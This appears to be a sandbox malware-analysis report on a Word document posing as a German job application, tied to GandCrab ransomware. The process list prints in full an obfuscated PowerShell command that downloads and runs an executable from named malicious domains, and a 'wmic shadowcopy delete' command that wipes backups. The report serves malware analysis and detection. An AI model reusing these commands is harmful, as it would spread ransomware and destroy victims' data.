File name: | Britta_Hollermann_Bewerbungsunterlagen.doc |
Full analysis: | https://app.any.run/tasks/869f7d86-c330-4d66-bbd2-2da4485b172c |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | March 14, 2019, 11:11:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 1B737B8B7CE22967D2D4CDEDF7DC210D |
SHA1: | DAF8C25D857FBC6E4D9D9B205C98338D54679485 |
SHA256: | DD27B85624CAC5B98F2670E1636C0B1787ECB088126D072F58DFB67C76D0FD09 |
SSDEEP: | 1536:Wq+PpgnKZXGdythQh/zkq9D4aqFrvlUmz8qtBvNL:1+Da37kq9zqYVqtBvNL |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
Description: | - |
---|---|
Creator: | admin |
Subject: | - |
Title: | - |
ModifyDate: | 2019:03:13 15:23:00Z |
---|---|
CreateDate: | 2019:03:13 14:16:00Z |
RevisionNumber: | 4 |
LastModifiedBy: | Admin |
Keywords: | - |
AppVersion: | 16 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 1 |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 1 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
Template: | Normal.dotm |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1637 |
ZipCompressedSize: | 427 |
ZipCRC: | 0x7df6b578 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3496 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Britta_Hollermann_Bewerbungsunterlagen.doc.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
2652 | c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $TpTHwrjVG = '$Xt6IXVHy = new-obj-658393886-16253271700ect -com-658393886-16253271700obj-658393886-16253271700ect wsc-658393886-16253271700ript.she-658393886-16253271700ll;$XdNivabeu = new-object sys-658393886-16253271700tem.net.web-658393886-16253271700client;$JgUosZV = new-object random;$aSBDE = \"-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://nagiah.website/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilecontractoffers.co.uk/public/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilessavingdeals.co.uk/database/word.exe\".spl-658393886-16253271700it(\",\");$o4jRc2Yx = $JgUosZV.nex-658393886-16253271700t(1, 65536);$V8GNV = \"c:\win-658393886-16253271700dows\tem-658393886-16253271700p\6.ex-658393886-16253271700e\";for-658393886-16253271700each($rWx2E in $aSBDE){try{$XdNivabeu.dow-658393886-16253271700nlo-658393886-16253271700adf-658393886-16253271700ile($rWx2E.ToS-658393886-16253271700tring(), $V8GNV);sta-658393886-16253271700rt-pro-658393886-16253271700cess $V8GNV;break;}catch{}}'.replace('-658393886-16253271700', $kDVZR);$adVuZW = '';iex($TpTHwrjVG); | c:\windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3284 | powershell $TpTHwrjVG = '$Xt6IXVHy = new-obj-658393886-16253271700ect -com-658393886-16253271700obj-658393886-16253271700ect wsc-658393886-16253271700ript.she-658393886-16253271700ll;$XdNivabeu = new-object sys-658393886-16253271700tem.net.web-658393886-16253271700client;$JgUosZV = new-object random;$aSBDE = \"-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://nagiah.website/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilecontractoffers.co.uk/public/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilessavingdeals.co.uk/database/word.exe\".spl-658393886-16253271700it(\",\");$o4jRc2Yx = $JgUosZV.nex-658393886-16253271700t(1, 65536);$V8GNV = \"c:\win-658393886-16253271700dows\tem-658393886-16253271700p\6.ex-658393886-16253271700e\";for-658393886-16253271700each($rWx2E in $aSBDE){try{$XdNivabeu.dow-658393886-16253271700nlo-658393886-16253271700adf-658393886-16253271700ile($rWx2E.ToS-658393886-16253271700tring(), $V8GNV);sta-658393886-16253271700rt-pro-658393886-16253271700cess $V8GNV;break;}catch{}}'.replace('-658393886-16253271700', $kDVZR);$adVuZW = '';iex($TpTHwrjVG); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2456 | "C:\windows\temp\6.exe" | C:\windows\temp\6.exe | powershell.exe | ||||||||||||
User: admin Company: djsoft.net (c) 2003-2015 Integrity Level: MEDIUM Description: Nullable Arsenals Identifier Addpackage Modules
| |||||||||||||||
3524 | "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete | C:\Windows\system32\wbem\wmic.exe | 6.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3544 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | -*( |
Value: 2D2A2800A80D0000010000000000000000000000 | |||
(PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1315831829 | |||
(PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1315831948 | |||
(PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1315831949 | |||
(PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: A80D0000541CFFAB56DAD40100000000 | |||
(PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | 6+( |
Value: 362B2800A80D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | 6+( |
Value: 362B2800A80D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDE0D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3284 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0REU5OT2TX23C2SRSWSB.temp | — | |
MD5:— | SHA256:— | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BBE86179.jpeg | — | |
MD5:— | SHA256:— | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF3D0D9E0D9A69935B.TMP | — | |
MD5:— | SHA256:— | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFF66B00BEDEE685AB.TMP | — | |
MD5:— | SHA256:— | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:91562183A148E0D59CD1566F34F9E03A | SHA256:41F0B6120BDB1998437427A28573E2E1E8BE36299C55CE0D3B20716C79EF948A | |||
3284 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0586DB8FF5249AD980CEC7BF2CBC3708 | SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2 | |||
3496 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F8B8C7F09D248F6157550214C723765E | SHA256:F08A143739B0319BE7904A72EEF4B7711C4D73ADF206A1F36024D257F2B4C098 | |||
2456 | 6.exe | C:\Config.Msi\BBLSQ-MANUAL.txt | text | |
MD5:108C3F142C8EC885B99E7ADDAF7A9D16 | SHA256:8D7F52AC9ACA4B2143CBDE8A120E49BB8D2332BCC4EDCE6C0D6158A0934C3D9F | |||
2456 | 6.exe | C:\BBLSQ-MANUAL.txt | text | |
MD5:108C3F142C8EC885B99E7ADDAF7A9D16 | SHA256:8D7F52AC9ACA4B2143CBDE8A120E49BB8D2332BCC4EDCE6C0D6158A0934C3D9F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3284 | powershell.exe | GET | 200 | 185.61.154.3:80 | http://mobilecontractoffers.co.uk/public/word.exe | GB | executable | 674 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3284 | powershell.exe | 185.61.154.3:80 | mobilecontractoffers.co.uk | Namecheap, Inc. | GB | malicious |
Domain | IP | Reputation |
---|---|---|
nagiah.website |
| malicious |
mobilecontractoffers.co.uk |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3284 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3284 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |